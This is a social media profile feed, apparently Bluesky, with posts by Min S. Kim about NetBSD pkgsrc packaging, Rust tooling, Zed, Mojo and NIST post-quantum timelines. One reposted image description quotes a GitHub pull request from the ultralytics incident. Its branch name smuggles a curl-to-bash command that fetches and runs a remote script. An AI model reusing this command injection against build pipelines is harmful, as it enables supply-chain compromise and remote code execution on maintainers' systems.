Advertisement · 728 × 90

Posts by Min S. Kim

pkgsrc.se | The NetBSD package collection

Packaged uv for pkgsrc-wip, planned to import after pkgsrc ditches cvs for git. Props to wiz for updating & adding it to devel/uv—now in pkgsrc!

pkgsrc.se/devel/uv

1 year ago 0 0 0 0

I've used Axum, but not for Swagger UI integration. Honestly, poem-openapi has been such a smooth experience that I haven't felt the need to explore other options for OpenAPI/Swagger in Rust.

1 year ago 0 0 0 0
Re: Core statement on version control systems

Finally, a plan to move NetBSD away from CVS after 10 years! Check out the details: mail-index.netbsd.org/tech-reposit...

1 year ago 1 0 0 0
Running NetBSD on IBM ThinkPad 380Z

Running NetBSD on IBM ThinkPad 380Z Discussion

1 year ago 0 1 0 0

Built a Rust CLI tool with Candle running SmolLM2 1.7B on my M1 Mac mini, and it's surprisingly responsive. Startup time is just a couple seconds and it generates ~35 tokens/sec consistently.

#rustlang

1 year ago 3 0 0 0
Preview
Introducing Limbo: A complete rewrite of SQLite in Rust we forked SQLite with the libSQL project. What would it be like if we just rewrote it?

This is a huge undertaking, but I'm all for competition! Let them cook! turso.tech/blog/introdu...

1 year ago 107 15 1 2
Preview
GitHub - NetBSD/pkgsrc: Automatic conversion of the NetBSD pkgsrc CVS module, use with care Automatic conversion of the NetBSD pkgsrc CVS module, use with care - NetBSD/pkgsrc

After a brief hiatus, the #pkgsrc GitHub mirror is now up-to-date again! Now's the time to sync and get back to work.

github.com/NetBSD/pkgsrc

1 year ago 0 0 0 0
Advertisement
Picture of a Github PR with text reading

openimbot wants to merge 0 commits into ultralytics:main from openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)

Picture of a Github PR with text reading openimbot wants to merge 0 commits into ultralytics:main from openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)

absolutely incredible attack vector

1 year ago 949 258 17 53
Post image

A small tasty treat for Emacs-loving Zed users. Following the beta Emacs keymap that shipped in v0.162, Zed now also includes `ctrl-k` / `ctrl-y` Cut and Yank actions.

1 year ago 8 2 2 0

Day 1 of #AdventOfCode with Mojo: compiler crash with the dreaded message:

mojo crashed!
Please file a bug report.

I knew Mojo was early-stage, but I didn’t expect to hit a wall this soon.

1 year ago 0 0 0 0
Preview
GitHub - huggingface/huggingface_hub: The official Python client for the Huggingface Hub. The official Python client for the Huggingface Hub. - huggingface/huggingface_hub

Just added py-huggingface-hub (github.com/huggingface/...) to pkgsrc-wip. This new package should simplify managing the Hugging Face cache directory when using Candle with public models.

#pkgsrc

1 year ago 0 0 0 0
Preview
crates.io: Rust Package Registry

For Rust, I've had a great experience using the Poem framework combined with the poem-openapi crate.

crates.io/crates/poem-...

1 year ago 3 0 1 0

Thinking of tackling this year‘s #AdventOfCode with Mojo. It seems like a great chance to dive into the language and see if it’s mature enough for basic problem solving. Looking forward to the challenge—and learning something new along the way!

1 year ago 0 0 1 0
Standardization of Additional Digital Signature Schemes - Post-Quantum Cryptography: Additional Digital Signature Schemes | CSRC | CSRC Call for Additional Digital Signature Schemes for the Post-Quantum Cryptography Standardization Process (PDF) Closed June 1, 2023 The Round 2 candidates were announced October 24, 2024. NIST IR 8528...

NIST released a draft of a non-binding document (IR 8547 ipd) saying they plan to disallow non-PQC in 2035.

2035 is ten years from now, there's no need to rush anything right now.

csrc.nist.gov/Projects/pqc... is still running and large ecosystems are still figuring out what/how to deploy.

1 year ago 63 23 4 1
Preview
Stabilize the 2024 edition by ehuss · Pull Request #133349 · rust-lang/rust This stabilizes the 2024 edition for Rust 1.85, scheduled to be released on February 20, 2025. 🎉 cc tracking issue: #117258 There is a fair amount of follow-up work after this that I am working on ...

Yo; so Rust just kinda did this thing: github.com/rust-lang/ru...! Congratulations to the team, I'm really looking forward to using the 2024 edition :)!

1 year ago 9 1 0 0
Advertisement
NetBSD/evbarm 10.0 installation screen showing a blue text-based interface with options to select the language for installation messages. The options include English, French, German, Polish, and Spanish, with English currently selected.

NetBSD/evbarm 10.0 installation screen showing a blue text-based interface with options to select the language for installation messages. The options include English, French, German, Polish, and Spanish, with English currently selected.

Setting up a NetBSD/evbarm VM to test new pkgsrc packages. It always feels like home when working with #NetBSD and #pkgsrc.

1 year ago 0 0 0 0
Dsu in ac_library::dsu - Rust A Disjoint set union (DSU) with union by size and path compression.

RustでUnionFindを実装するなら、ac-library-rsクレートのDsu構造体が参考になるかもしれません。ドキュメントはこちらです:
docs.rs/ac-library-r...

1 year ago 0 0 0 0
Preview
RustConf 2024 - YouTube The Rust Foundation hosted the annual RustConf event for the first time in 2024 in Montreal, Canada and online on September 11 & 12. We also hosted Rust Glob...

RustConf 24 talks are up:

www.youtube.com/playlist?lis...

In one of them some middle aged man rants about the good old days with CRTs and Amigas and gets salty with t-compiler.

1 year ago 9 4 0 0
EV3 brick booting up

EV3 brick booting up

Just revived an old EV3 with an updated ev3dev image. Time to reboot those old Python projects in Rust!

1 year ago 0 0 0 0
Introduction - Asynchronous Programming in Rust

The first couple of chapters of the new #rustlang async book are live! rust-lang.github.io/async-book/p... It's still a bit rough, and there's a lot more to come. Feedback and PRs are welcome!

1 year ago 135 33 7 1

Finally got around to setting up my custom domain. Nice to have a proper home here.

1 year ago 0 0 0 0